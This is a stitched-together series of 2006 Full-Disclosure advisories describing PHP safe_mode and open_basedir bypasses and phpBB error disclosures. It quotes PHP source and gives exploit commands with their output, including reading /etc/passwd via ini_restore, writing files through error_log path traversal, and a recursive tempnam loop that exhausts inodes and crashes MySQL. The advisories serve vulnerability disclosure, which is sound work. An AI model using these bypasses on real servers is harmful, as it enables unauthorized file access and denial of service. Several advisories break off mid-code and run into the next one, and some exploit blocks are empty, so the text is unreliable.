/tmp/4/b/1/e/3/sess_4b1e384ad74619bd212e236e52a5a174If . In order to use N you
must create all of these directories before use. A small shell script exists in
ext/session to do this, it's called mod_files.sh. Also note that if N is used
and greater than 0 then automatic garbage collection will not be performed, see
a copy of php.ini for further information. Also, if you use N, be sure to
surround session.save_path in "quotes" because the separator (;) is also used
for comments in php.ini.
- --- 1. session.save_path safe mode and open basedir bypass ---
session.save_path can be set in ini_set(), session_save_path() function. In
session.save_path there must be path where you will save yours tmp file. But
syntax for session.save_path can be:
[/PATH]
OR
[N;/PATH]
N - can be a string.
EXAMPLES:
1. session_save_path("/DIR/WHERE/YOU/HAVE/ACCESS")
2. session_save_path("5;/DIR/WHERE/YOU/HAVE/ACCESS")
and
3.
session_save_path("/DIR/WHERE/YOU/DONT/HAVE/ACCESS\0;/DIR/WHERE/YOU/HAVE/ACCESS")
- -1477-1493--- Code from PHP520 ext/session/session.c [START]
PHP_FUNCTION(session_save_path)
{
zval **p_name;
int ac = ZEND_NUM_ARGS();
char *old;
if (ac < 0 || ac > 1 || zend_get_parameters_ex(ac, &p_name) == FAILURE)
WRONG_PARAM_COUNT;
old = estrdup(PS(save_path));
if (ac == 1) {
convert_to_string_ex(p_name);
zend_alter_ini_entry("session.save_path",
sizeof("session.save_path"), Z_STRVAL_PP(p_name), Z_STRLEN_PP(p_name),
PHP_INI_USER, PHP_INI_STAGE_RUNTIME);
}
RETVAL_STRING(old, 0);
}
- -1477-1493--- Code from PHP520 ext/session/session.c [END]
Values are set to hash_memory (but before that, safe_mode and open_basedir
check this value).
And if you are starting session (for example session_start()), that value from
session.save_path is checked by function PS_OPEN_FUNC(files).
- -242-300--- Code from PHP520 ext/session/mod_files.c [START]
PS_OPEN_FUNC(files)
{
ps_files *data;
const char *p, *last;
const char *argv[3];
int argc = 0;
size_t dirdepth = 0;
int filemode = 0600;
if (*save_path == '\0') {
/* if save path is an empty string, determine the temporary dir
*/
save_path = php_get_temporary_directory();
}
/* split up input parameter */
last = save_path;
p = strchr(save_path, ';');
while (p) {
argv[argc++] = last;
last = ++p;
p = strchr(p, ';');
if (argc > 1) break;
}
argv[argc++] = last;
if (argc > 1) {
errno = 0;
dirdepth = (size_t) strtol(argv[0], NULL, 10);
if (errno == ERANGE) {
php_error(E_WARNING,
"The first parameter in
session.save_path is invalid");
return FAILURE;
}
}
if (argc > 2) {
errno = 0;
filemode = strtol(arg
[Full-disclosure] PHP 5.1.6 / 4.4.4 Critical php_admin* bypass by ini_restore()
Source: http://securityreason.com/achievement_securityalert/42 -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [PHP 5.1.6 / 4.4.4 Critical php_admin* bypass by ini_restore()] Author: Maksymilian Arciemowicz (cXIb8O3) Date: - - Written: 05.09.2006 - - Public: 09.09.2006 SecurityAlert Id: 42 CVE: CVE-2006-4625 SecurityRisk: High Affected Software: PHP 5.1.6 / 4.4.4 < = x Advisory URL: http://securityreason.com/achievement_securityalert/42 Vendor: http://www.php.net - --- 0.Description --- PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly. A nice introduction to PHP by Stig Sæther Bakken can be found at http://www.zend.com/zend/art/intro.php on the Zend website. Also, much of the PHP Conference Material is freely available. php_admin_value name value Sets the value of the specified directive. This can not be used in .htaccess files. Any directive type set with php_admin_value can not be overridden by .htaccess or virtualhost directives. To clear a previously set value use none as the value. php_admin_flag name on|off Used to set a boolean configuration directive. This can not be used in .htaccess files. Any directive type set with php_admin_flag can not be overridden by .htaccess or virtualhost directives. http://pl.php.net/manual/en/configuration.changes.php - --- 1. php_admin_value and php_admin_flag Bypass --- When using PHP as an Apache module, you can also change the configuration settings using directives in Apache configuration files (e.g. httpd.conf). This options are using by a lot of ISP to set open_basedir, safe_mode and more options. For example: open_basedir in httpd.conf - --- Options FollowSymLinks MultiViews Indexes AllowOverride None php_admin_flag safe_mode 1 php_admin_value open_basedir /usr/home/frajer/public_html/ - --- In PHP are two config options. Are Local Value and Master Value. More in phpinfo() or ini_get() Example: If you have safe_mode or open_basedir (etc) set in Local Value for selected users and in Master Value is default value, you can restore Master Value to Local Value per ini_restore() function! - --- ini_restore (PHP 4, PHP 5) ini_restore -- Restores the value of a configuration option - --- Restores the value of a php.ini file. Then your PHP options from httpd.conf are bypassed. EXPLOIT: - --- - --- RESULT OF EXPLOIT: - --- 1 /usr/home/frajer/public_html/ Warning: include() [function.include]: open_basedir restriction in effect. File(/etc/passwd) is not within the allowed path(s): (/usr/home/frajer/public_html/) in /usr/home/frajer/public_html/ini_restore.php on line 4 Warning: include(/etc/passwd) [function.include]: failed to open stream: Operation not permitted in /usr/home/frajer/public_html/ini_restore.php on line 4 Warning: include() [function.include]: Failed opening '/etc/passwd' for inclusion (include_path='.:') in /usr/home/frajer/public_html/ini_restore.php on line 4 # $BSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $ # root:*:0:0:Charlie &:/root:/bin/csh toor:*:0:0:Bourne-ag. - --- This issue is very dangerous, because Admin can't correct set open_basedir or safe_mode for all users. - --- 2. How to fix --- fixed in CVS HEAD, PHP_5_2, PHP_5_1 and PHP_4_4. http://cvs.php.net/viewcvs.cgi/php-src/NEWS - --- 3. Greets --- For: sp3x and p_e_a, l5x - --- 4. Contact --- Author: SecurityReason.Com [ Maksymilian Arciemowicz ( cXIb8O3 ) ] Email: cxib [at] securityreason [dot] com GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg Regards SecurityReason -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2.2 (FreeBSD) iD8DBQFFApZZ3Ke13X/fTO4RAmA4AJ9g4rA0hqST7Px7i03RGpE1bmZmrgCgmt0a SvP3KPhmLtZcCNFmtGa8oJ8= =bqQV -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] error_log() Safe Mode Bypass PHP 5.1.4 and 4.4.2
Source: http://securityreason.com/achievement_securityalert/41
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
[error_log() Safe Mode Bypass PHP 5.1.4 and 4.4.2]
Author: Maksymilian Arciemowicz (cXIb8O3)
Date:
- -Written: 10.6.2006
- -Public: 26.06.2006
from SECURITYREASON.COM
CVE-2006-3011
- --- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from
C, Java and Perl with a couple of unique PHP-specific features thrown in. The
goal of the language is to allow web developers to write dynamically generated
pages quickly.
A nice introduction to PHP by Stig Sæther Bakken can be found at
http://www.zend.com/zend/art/intro.php on the Zend website. Also, much of the
PHP Conference Material is freely available.
error_log -- Send an error message somewhere.
- --- 1. error_log() Safe Mode Bypass ---
error_log() function send to email, file or display your error message. You can
send error messages per mail or write into files. Issue is very simple.
error_log() check safe_mode and open_basedir in stream function. But isn't
allowed use URL. And problem exists in incorrect filename.
PHP5:
- -2013-2050---
PHPAPI int _php_error_log(int opt_err, char *message, char *opt, char *headers
TSRMLS_DC)
{
php_stream *stream = NULL;
switch (opt_err) {
case 1: /*send an email */
{
#if HAVE_SENDMAIL
if (!php_mail(opt, "PHP error_log message",
message, headers, NULL TSRMLS_CC)) {
return FAILURE;
}
#else
php_error_docref(NULL TSRMLS_CC, E_WARNING,
"Mail option not available!");
return FAILURE;
#endif
}
break;
case 2: /*send to an address */
php_error_docref(NULL TSRMLS_CC, E_WARNING, "TCP/IP
option not available!");
return FAILURE;
break;
case 3: /*save to a file */
stream = php_stream_open_wrapper(opt, "a", IGNORE_URL |
ENFORCE_SAFE_MODE | REPORT_ERRORS, NULL);
if (!stream)
return FAILURE;
php_stream_write(stream, message, strlen(message));
php_stream_close(stream);
break;
default:
php_log_err(message TSRMLS_CC);
break;
}
return SUCCESS;
}
- -2013-2050---
Let's see to option 3.
- -2038 line---
stream = php_stream_open_wrapper(opt, "a", IGNORE_URL | ENFORCE_SAFE_MODE |
REPORT_ERRORS, NULL);
- -2038 line---
Option "a", writte to file error or if file dosen't exists, create new file.
Problem is because in php_stream_open_wrapper(), is defined "IGNORE_URL".
IGNORE_URL turn off safe_mode if you use "prefix://../../".
- -Example---
cxib# php -r 'error_log("", 3, "/www/temp/sr.php");'
Warning: error_log(): SAFE MODE Restriction in effect. The script whose uid is
0 is not allowed to access /www/temp owned by uid 80 in Command line code on
line 1
Warning: error_log(/www/temp/sr.php): failed to open stream: Invalid argument
in Command line code on line 1
cxib# php -r 'error_log("", 3,
"php://../../www/temp/sr.php");'
cxib# ls -la /www/temp/sr.php
- -rw-r--r-- 1 cxib www 16 Jun 11 17:47 /www/temp/sr.php
cxib#
- -Example---
- --- 2. Exploit ---
", 3, "php://../../".$file);
?>
- --- 3. How to fix ---
No response from PHP Team. We have reported this bug in 11.06.2006
- --- 4. Greets ---
For: sp3x
and
p_e_a, l3x, pi3, eax, Infospec, gKPc8O3
- --- 5. Contact ---
Author: SecurityReason.Com [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
SecurityReason.Com
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.3 (FreeBSD)
iD8DBQFEnwdh3Ke13X/fTO4RAv1eAJ9Gux0j+TtpuvsLMhGRu+b0B86DJQCfR4ps
qXoX8VYnwFBa2VmK3zlxpGs=
=VAkg
-END PGP SIGNATURE-
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] tempnam() Bypass unique file name PHP 5.1.4
Source: http://securityreason.com/achievement_securityalert/40
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
[tempnam() Bypass unique file name PHP 5.1.4]
Author: Maksymilian Arciemowicz (cXIb8O3)
Date:
- -Written: 22.5.2006
- -Public: 11.6.2006
from SECURITYREASON.COM
CVE-2006-2660
- --- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from
C, Java and Perl with a couple of unique PHP-specific features thrown in. The
goal of the language is to allow web developers to write dynamically generated
pages quickly.
A nice introduction to PHP by Stig Sæther Bakken can be found at
http://www.zend.com/zend/art/intro.php on the Zend website. Also, much of the
PHP Conference Material is freely available.
tempnam -- Create file with unique file name.
- --- 1. tempnam() Bypass unique file name ---
In lastes adv i have public an issue "Open Basedir Bypass". In function
tempname() are required 2 arg`s.
http://pl.php.net/manual/en/function.tempnam.php
string tempnam ( string dir, string prefix )
In PHP 5.1.4 exists bug that allows you to create file with any name.
- ---
cxib# php -r 'echo tempnam("/www/temp/", "hacker.php")."\n";'
/www/temp/hacker.phpGQMqSE
- ---
You have created file /www/temp/hacker.phpGQMqSE. "GQMqSE" is automatically
added to filename.
Problem exists, because path couldn't be longer than MAXPATHLEN. In standard
MAXPATHLEN is 1024B.
- -771-805---
PHP_FUNCTION(tempnam)
{
zval **arg1, **arg2;
char *d;
char *opened_path;
char *p;
int fd;
size_t p_len;
if (ZEND_NUM_ARGS() != 2 || zend_get_parameters_ex(2, &arg1, &arg2) ==
FAILURE) {
WRONG_PARAM_COUNT;
}
convert_to_string_ex(arg1);
convert_to_string_ex(arg2);
if (php_check_open_basedir(Z_STRVAL_PP(arg1) TSRMLS_CC)) {
RETURN_FALSE;
}
d = estrndup(Z_STRVAL_PP(arg1), Z_STRLEN_PP(arg1));
php_basename(Z_STRVAL_PP(arg2), Z_STRLEN_PP(arg2), NULL, 0, &p, &p_len
TSRMLS_CC);
if (p_len > 64) {
p[63] = '\0';
}
if ((fd = php_open_temporary_fd(d, p, &opened_path TSRMLS_CC)) >= 0) {
close(fd);
RETVAL_STRING(opened_path, 0);
} else {
RETVAL_FALSE;
}
efree(p);
efree(d);
}
- -771-805---
So if you create path like /www/../www/.. etc.
arg1+arg2=1023
uniqueid is not given to path.
Example:
- ---
cxib# php -r 'echo
tempnam("/www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../dupa/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../dupa/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/temp/",
"hacker.php")."\n";'
/www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../dupa/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../dupa/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/temp/hacker.php
- ---
= /www/temp/hacker.php
- ---
cxib# ls -la /www/temp/hacker*
- -rw--- 1 cxib cxib 0 May 22 23:33 /www/temp/hacker.php
- -rw--- 1 cxib cxib 0 May 22 23:26 /www/temp/hacker.phpGQMqSE
- ---
- --- 2. How to fix ---
CVS
h
[Full-disclosure] cURL Safe Mode Bypass PHP 4.4.2 and 5.1.4
Source: http://securityreason.com/achievement_securityalert/39 -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [cURL Safe Mode Bypass PHP 4.4.2 and 5.1.4] Author: Maksymilian Arciemowicz (cXIb8O3) Date: - -Written: 15.5.2006 - -Public: 27.5.2006 from SECURITYREASON.COM CVE-2006-2563 - --- 0.Description --- PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly. A nice introduction to PHP by Stig Sather Bakken can be found at http://www.zend.com/zend/art/intro.php on the Zend website. Also, much of the PHP Conference Material is freely available. The PHP safe mode is an attempt to solve the shared-server security problem. It is architecturally incorrect to try to solve this problem at the PHP level, but since the alternatives at the web server and OS levels aren't very realistic, many people, especially ISP's, use safe mode for now. PHP supports libcurl, a library created by Daniel Stenberg, that allows you to connect and communicate to many different types of servers with many different types of protocols. libcurl currently supports the http, https, ftp, gopher, telnet, dict, file, and ldap protocols. libcurl also supports HTTPS certificates, HTTP POST, HTTP PUT, FTP uploading (this can also be done with PHP's ftp extension), HTTP form based upload, proxies, cookies, and user+password authentication. These functions have been added in PHP 4.0.2. - --- 1. Safe Mode Bypass in cURL--- General problem exists in cURL functions, because are changed safe_mode, strings 0 (\x00) are change to "_". Next bug exists in prefix file://, becaluse safe_mode checks only path at file:///. Example: - -Safe_Mode bypass exploit.1--- - -Safe_Mode bypass exploit.1--- Safe_mode checks only access only to __FILE__. But cURL include filethatyoudonthaveaccessto.php. So you can include any files from directory where script is. But in this exploit, you can only read files from directory where is this script. You can't use "/". There is another conception for an exploit: if you have an access to a directory (rights) where you want to read files. So, if you want to include files from "/home/czarnobyl/www/directoryWITHyourRIGHT/fileFROManotherUSER.php", you should make a dir like "/home/czarnobyl/www/directoryWITHyourRIGHT/fileFROManotherUSER.php_/": - -Safe_Mode bypass exploit.2--- - -Safe_Mode bypass exploit.2--- Safe mode checks access to file "file:///home/czarnobyl/www/directoryWITHyourRIGHT/fileFROManotherUSER.php_/../../../../../../YourFile.php" And cURL include only "file:///home/czarnobyl/www/directoryWITHyourRIGHT/fileFROManotherUSER.php" because \x00 are ending path to file. - --- 2. How to fix --- CVS http://cvs.php.net/viewcvs.cgi/php-src/ext/curl/ - --- 3. Greets --- For: sp3x and p_e_a, l5x, Infospec, pi3, eax - --- 4. Contact --- Author: SecurityReason.Com [ Maksymilian Arciemowicz ( cXIb8O3 ) ] Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg SecurityReason.Com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.3 (FreeBSD) iD8DBQFEd4bS3Ke13X/fTO4RAsCvAJ9eTxATfJRZZ2/DEoinl4R3Y+DZgACgvHQk v8npsbXGJqmJRiAT9lnCyv8= =mI80 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] phpBB 2.0.20 Full Path Disclosure and SQL Errors
Source: http://securityreason.com/achievement_securityalert/38
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
[phpBB 2.0.20 Full Path Disclosure and SQL Errors]
Author: Maksymilian Arciemowicz (cXIb8O3)
Date:
- -Written: 1.5.2006
- -Public: 5.5.2006
from SecurityReason.Com
CVE:
- - CVE-2006-2219 Full Path Disclosure
- - CVE-2006-2220 Sql Errors
- --- 0.Description ---
phpBB is a high powered, fully scalable, and highly customizable Open Source
bulletin board package. phpBB has a
user-friendly interface, simple and straightforward administration panel, and
helpful FAQ. Based on the powerful PHP
server language and your choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC
database servers, phpBB is the ideal
free community solution for all web sites.
Contact with author http://www.phpbb.com/about.php.
- --- 1. Full Path Disclosure ---
Many scripts, for example phpBB, have a basic bug. It exists in variables,
which are being inserted into script, into specific functions. For example
function htmlspecialchars()
...
if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s|ls", &str,
&str_len, "e_style, &hint_charset, &hint_charset_len) == FAILURE) {
return;
}
...
As you can see there is a protection from formatting input variable. If the
variable is other than string, we have error with Full Path Disclosure.
Example:
http://[HOST]/2020/phpBB2/memberlist.php?mode[]=cx
- ---Code ---
if ( isset($HTTP_GET_VARS['mode']) || isset($HTTP_POST_VARS['mode']) )
{
$mode = ( isset($HTTP_POST_VARS['mode']) ) ?
htmlspecialchars($HTTP_POST_VARS['mode']) :
htmlspecialchars($HTTP_GET_VARS['mode']);
}
else
{
$mode = 'joined';
}
- ---Code ---
- ---Result ---
Warning: htmlspecialchars() expects parameter 1 to be string, array given in
/www/2020/phpBB2/memberlist.php on line 40
Warning: Cannot modify header information - headers already sent by (output
started at /www/2020/phpBB2/memberlist.php:40) in
/www/2020/phpBB2/includes/page_header.php on line 483
Warning: Cannot modify header information - headers already sent by (output
started at /www/2020/phpBB2/memberlist.php:40) in
/www/2020/phpBB2/includes/page_header.php on line 485
Warning: Cannot modify header information - headers already sent by (output
started at /www/2020/phpBB2/memberlist.php:40) in
/www/2020/phpBB2/includes/page_header.php on line 486
- ---Result ---
http://[HOST]/2020/phpBB2/viewtopic.php?t=2&highlight[]=cx
- ---Result ---
Warning: htmlspecialchars() expects parameter 1 to be string, array given in
/www/2020/phpBB2/viewtopic.php on line 487
Warning: urlencode() expects parameter 1 to be string, array given in
/www/2020/phpBB2/viewtopic.php on line 498
Warning: Cannot modify header information - headers already sent by (output
started at /www/2020/phpBB2/viewtopic.php:487) in
/www/2020/phpBB2/includes/page_header.php on line 483
Warning: Cannot modify header information - headers already sent by (output
started at /www/2020/phpBB2/viewtopic.php:487) in
/www/2020/phpBB2/includes/page_header.php on line 485
Warning: Cannot modify header information - headers already sent by (output
started at /www/2020/phpBB2/viewtopic.php:487) in
/www/2020/phpBB2/includes/page_header.php on line 486
- ---Result ---
Problem appears if display_errors==1, but it exists on many websites. (even at
php.net).
- --- 2. Sql Errors ---
Problem appears because we can add everything (INT) to the end of SQL query
(LIMIT). The query will fail if the value is below 0 or above -2^32.
Example:
http://[HOST]/2020/phpBB2/memberlist.php?start=-1
- ---Code ---
$start = ( isset($HTTP_GET_VARS['start']) ) ? intval($HTTP_GET_VARS['start']) :
0;
- ---Code ---
- ---Result ---
Could not query users
DEBUG MODE
SQL Error : 1064 You have an error in your SQL syntax; check the manual that
corresponds to your MySQL server version for the right syntax to use near '-1,
50' at line 4
SELECT username, user_id, user_viewemail, user_posts, user_regdate, user_from,
user_website, user_email, user_icq, user_aim, user_yim, user_msnm, user_avatar,
user_avatar_type, user_allowavatar FROM phpbb_users WHERE user_id <> -1 ORDER
BY user_regdate ASC LIMIT -1, 50
Line : 151
File : memberlist.php
- ---Result ---
- --- 3. How to fix ---
Turn off display_errors or use function like is_string().
- --- 4. Greets ---
sp3x
Infospec, p_e_a, krasza, revival, l5x
- --- 5. Contact ---
Author: SecurityReason.Com [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
SecurityReason.Com
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2.2 (FreeBSD)
iD8DBQFEW4pi3Ke13X/fTO4RAqV7AJ9PeZ9nbRUYATqArEzLOdenG1ypHwCguPa5
7DlqP3M3vq1frb7Zc3y+KrU=
=4U6Y
-END PGP SIGNATURE-
__
[Full-disclosure] copy() Safe Mode Bypass PHP 4.4.2 and 5.1.2
Source: http://securityreason.com/achievement_securityalert/37
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
[copy() Safe Mode Bypass PHP 4.4.2 and 5.1.2]
Author: Maksymilian Arciemowicz (cXIb8O3)
Date:
- -Written: 2.4.2006
- -Public: 8.4.2006
from SECURITYREASON.COM
CVE-2006-1608
- --- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed
from C, Java and Perl with a couple of unique PHP-specific features thrown
in. The goal of the language is to allow web developers to write dynamically
generated pages quickly.
A nice introduction to PHP by Stig Sæther Bakken can be found at
http://www.zend.com/zend/art/intro.php on the Zend website. Also, much of the
PHP Conference Material is freely available.
The PHP safe mode is an attempt to solve the shared-server security problem.
It is architecturally incorrect to try to solve this problem at the PHP
level, but since the alternatives at the web server and OS levels aren't very
realistic, many people, especially ISP's, use safe mode for now.
- --- 1. Safe Mode Bypass ---
General problem exists in safe mode function, because safe mode accept path
like "compress.zlib://".
PHP442 File "main/safe_mode.c"
- -78-80---
wrapper = php_stream_locate_url_wrapper(filename, NULL,
STREAM_LOCATE_WRAPPERS_ONLY TSRMLS_CC);
if (wrapper != NULL)
return 1;
- -78-80---
if php_stream_locate_url_wrapper() return something.. safe mode is going to
stop.
Let`s see the function php_stream_locate_url_wrapper().
PHP442 File "main/streams.c"
- -2522-2588---
PHPAPI php_stream_wrapper *php_stream_locate_url_wrapper(const char *path,
char **path_for_open, int options TSRMLS_DC)
{
HashTable *wrapper_hash = (FG(stream_wrappers) ? FG(stream_wrappers) :
&url_stream_wrappers_hash);
php_stream_wrapper *wrapper = NULL;
const char *p, *protocol = NULL;
int n = 0;
if (path_for_open)
*path_for_open = (char*)path;
if (options & IGNORE_URL)
return (options & STREAM_LOCATE_WRAPPERS_ONLY) ? NULL :
&php_plain_files_wrapper;
for (p = path; isalnum((int)*p) || *p == '+' || *p == '-' || *p == '.';
p++)
{
n++;
}
if ((*p == ':') && (n > 1) && !strncmp("://", p, 3)) {
protocol = path;
} else if (strncasecmp(path, "zlib:", 5) == 0) {
/* BC with older php scripts and zlib wrapper */
protocol = "compress.zlib";
n = 13;
if (options & REPORT_ERRORS) {
php_error_docref(NULL TSRMLS_CC, E_WARNING, "Use of
\"zlib:\" wrapper is
deprecated; please use \"compress.zlib://\" instead.");
}
}
if (protocol) {
if (FAILURE == zend_hash_find(wrapper_hash, (char*)protocol, n,
(void**)&wrapper)) {
char wrapper_name[32];
if (options & REPORT_ERRORS) {
if (n >= sizeof(wrapper_name))
n = sizeof(wrapper_name) - 1;
PHP_STRLCPY(wrapper_name, protocol,
sizeof(wrapper_name), n);
php_error_docref(NULL TSRMLS_CC, E_NOTICE,
"Unable to find the wrapper
\"%s\" - did you forget to enable it when you configured PHP?",
wrapper_name);
}
wrapper = NULL;
protocol = NULL;
}
}
/* TODO: curl based streams probably support file:// properly */
if (!protocol || !strncasecmp(protocol, "file", n)) {
if (protocol && path[n+1] == '/' && path[n+2] == '/') {
if (options & REPORT_ERRORS)
php_error_docref(NULL TSRMLS_CC, E_WARNING,
"remote host file access not
supported, %s", path);
return NULL;
}
if (protocol && path_for_open)
*path_for_open = (char*)path + n + 1;
/* fall back on regular file access */
return (options & STREAM_LOCATE_WRAPPERS_ONLY) ? NULL :
&php_plain_files_wrapper;
}
if (wrapper && wrapper->is_url && !PG(allow_url_fopen)) {
if (options & REPORT_ERRORS)
php_error_docref(NULL TSRMLS_CC, E_WARNING, "URL
file-access is disabled in
the server configuration");
return NULL;
}
[Full-disclosure] tempnam() open_basedir bypass PHP 4.4.2 and 5.1.2
Source: http://securityreason.com/achievement_securityalert/36
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
[tempnam() open_basedir bypass PHP 4.4.2 and 5.1.2]
Author: Maksymilian Arciemowicz (cXIb8O3)
Date:
- -Written: 26.3.2006
- -Public: 8.4.2006
from SECURITYREASON.COM
CVE-2006-1494
- --- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed
from C, Java and Perl with a couple of unique PHP-specific features thrown
in. The goal of the language is to allow web developers to write dynamically
generated pages quickly.
A nice introduction to PHP by Stig Sæther Bakken can be found at
http://www.zend.com/zend/art/intro.php on the Zend website. Also, much of the
PHP Conference Material is freely available.
tempnam -- Create file with unique file name
- --- 1. tempnam() open_basedir bypass ---
In function tempname() are required 2 arg`s.
http://pl.php.net/manual/en/function.tempnam.php
string tempnam ( string dir, string prefix )
So, if we have open_basedir set to /home, we can't create file over /home
directory.
In ext/standard/file.c (PHP 4.4.2)
- -550-578---
PHP_FUNCTION(tempnam)
{
pval **arg1, **arg2;
char *d;
char *opened_path;
char p[64];
FILE *fp;
if (ZEND_NUM_ARGS() != 2 || zend_get_parameters_ex(2, &arg1, &arg2) ==
FAILURE) {
WRONG_PARAM_COUNT;
}
convert_to_string_ex(arg1);
convert_to_string_ex(arg2);
if (php_check_open_basedir(Z_STRVAL_PP(arg1) TSRMLS_CC)) {
RETURN_FALSE;
}
d = estrndup(Z_STRVAL_PP(arg1), Z_STRLEN_PP(arg1));
strlcpy(p, Z_STRVAL_PP(arg2), sizeof(p));
if ((fp = php_open_temporary_file(d, p, &opened_path TSRMLS_CC))) {
fclose(fp);
RETVAL_STRING(opened_path, 0);
} else {
RETVAL_FALSE;
}
efree(d);
}
- -550-578---
if (php_check_open_basedir(Z_STRVAL_PP(arg1) TSRMLS_CC)) {
RETURN_FALSE;
}
Where is arg2?
So we can write exploit like:
tempnam("path_from_open_basedir",
"../../../../../../../../Open_basedir_bypasswd");
tempnam("/home", "../../../../../../tmp/cx");
etc.
It is low issue but you can try create a lot of files and overload inodes from
HD.I have one particion.
/var /dev/ad0s1e1.0G 97M858M10%/var <- Space (B)
/dev/ad0s1e 101297494472 83746610%3796 1375143% /var <-
INODES
where mysql and apache try create some file. WWhen we overload free inodes,
system have big problem with apache, mysql.
Example:
cxib# php -r 'function cx(){ tempnam("/www/", "../../../../../../var/tmp/cx");
cx(); } cx();'
/var: create/symlink failed, no inodes free
/var: create/symlink failed, no inodes free
/var: create/symlink failed, no inodes free
/var: create/symlink failed, no inodes free
... etc
/usr/local/libexec/mysqld: Can't create/write to file
'/var/tmp/ibBIsZ6o' (Errcode: 13)
And mysql die()!
- --- 2. How to fix ---
CVS
http://cvs.php.net/viewcvs.cgi/php-src/NEWS
- --- 3. Greets ---
For: sp3x
and
p_e_a, pi3, eax, Infospec ;]
- --- 4. Contact ---
Author: SecurityReason.Com [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
SecurityReason.Com
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2.2 (FreeBSD)
iD8DBQFEOAZB3Ke13X/fTO4RAiDmAKCbBZP8JBC0F/9cB5OgUFJPgqHB4QCgon9L
kBEMIExP2TZ0+NP7l5uk9TE=
=f3i4
-END PGP SIGNATURE-
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] function *() php/apache Crash PHP 4.4.2 and 5.1.2
Source: http://securityreason.com/achievement_securityalert/35
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
[function *() php/apache Crash PHP 4.4.2 and 5.1.2]
Author: Maksymilian Arciemowicz (cXIb8O3)
Date:
- -Written: 21.3.2006
- -Public: 8.4.2006
from SECURITYREASON.COM
CVE-2006-1549
- --- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed
from C, Java and Perl with a couple of unique PHP-specific features thrown
in. The goal of the language is to allow web developers to write dynamically
generated pages quickly.
A nice introduction to PHP by Stig Sæther Bakken can be found at
http://www.zend.com/zend/art/intro.php on the Zend website. Also, much of the
PHP Conference Material is freely available.
- --- 1. function *() Crash ---
